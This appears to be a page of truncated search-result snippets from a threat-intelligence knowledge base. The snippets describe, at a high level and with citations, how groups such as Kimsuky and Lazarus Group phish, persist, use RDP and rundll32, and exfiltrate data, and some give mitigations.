…December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. Sygnia Team. (2024, June 3). China-Nexus Threat Group ‘Velvet Ant’ Abuses F5 Load Balancers for Persistence. Retrieved March 14, 2025. Kaspersky Lab's Global Researc…
…33] S0201 JPIN JPIN can lower security settings by changing Registry keys. [34] G0094 Kimsuky Kimsuky has been observed turning off Windows Security Center. [35] G0032 Lazarus Group Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. A…
…H_SPY can exfiltrate collected information from the host to the C2 server. [48] G0094 Kimsuky Kimsuky has exfiltrated data over its email C2 channel. [49] G0032 Lazarus Group Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is uploaded t…
…apeka Kapeka queries registry values for stored configuration information. [60] G0094 Kimsuky Kimsuky has obtained specific Registry keys and values on a compromised host. [61] G0032 Lazarus Group Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to deter…
…GH_SPY has been spread through Word documents containing malicious macros. [45] G0094 Kimsuky Kimsuky has used attempted to lure victims into opening malicious e-mail attachments. [89] [90] [91] [45] [6] G0032 Lazarus Group Lazarus Group has attempted to get users to launch a mal…
…rrdown Kerrdown has been distributed through malicious e-mail attachments. [29] G0094 Kimsuky Kimsuky has used emails containing Word, Excel and/or HWP (Hangul Word Processor) documents in their spearphishing campaigns. [101] [102] [103] [104] [105] [6] G0032 Lazarus Group Lazaru…
…ed RDP for lateral movement. [44] S0283 jRAT jRAT can support RDP control. [45] G0094 Kimsuky Kimsuky has used RDP for direct remote point-and-click access. [46] S0250 Koadic Koadic can enable remote desktop on the victim's machine. [47] G0032 Lazarus Group Lazarus Group malware …
…emote Desktop Users group membership regularly. Remove unnecessary accounts and groups from Remote Desktop Users groups. M1042 Disable or Remove Feature or Program Disable the RDP service if it is unnecessary. M1035 Limit Access to Resource Over Network Use remote desktop gateway…
…GH_SPY KGH_SPY can send a file containing victim system information to C2. [66] G0094 Kimsuky Kimsuky has collected Office, PDF, and HWP documents from its victims. [67] S0250 Koadic Koadic can download files off the target system to send back to the server. [68] G0032 Lazarus Gr…
…December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018. Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Per…
…hang Several Ke3chang backdoors achieved persistence by adding a Run key. [117] G0094 Kimsuky Kimsuky has placed scripts in the startup folder for persistence. [118] [33] [119] S0356 KONNI A version of KONNI drops a Windows shortcut into the Startup folder to establish persistenc…
…eat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021. Roccia, T., …
…guage models (LLMs) to gather information about satellite capabilities. [3] [4] G0094 Kimsuky Kimsuky has collected victim organization information including but not limited to organization hierarchy, functions, press releases, and others. [5] Kimsuky has also used large language…
…eka Kapeka is a Windows DLL file executed via ordinal by rundll32.exe [64] [65] G0094 Kimsuky Kimsuky has used rundll32.exe to execute malicious scripts and malware on a victim's network. [66] S0250 Koadic Koadic can use Rundll32 to execute additional payloads. [67] S0356 KONNI K…
…a Kapeka is a Windows DLL file executed via ordinal by rundll32.exe . [66] [67] G0094 Kimsuky Kimsuky has used rundll32.exe to execute malicious scripts and malware on a victim's network. [68] S0250 Koadic Koadic can use Rundll32 to execute additional payloads. [69] S0356 KONNI K…
Page 1
Next →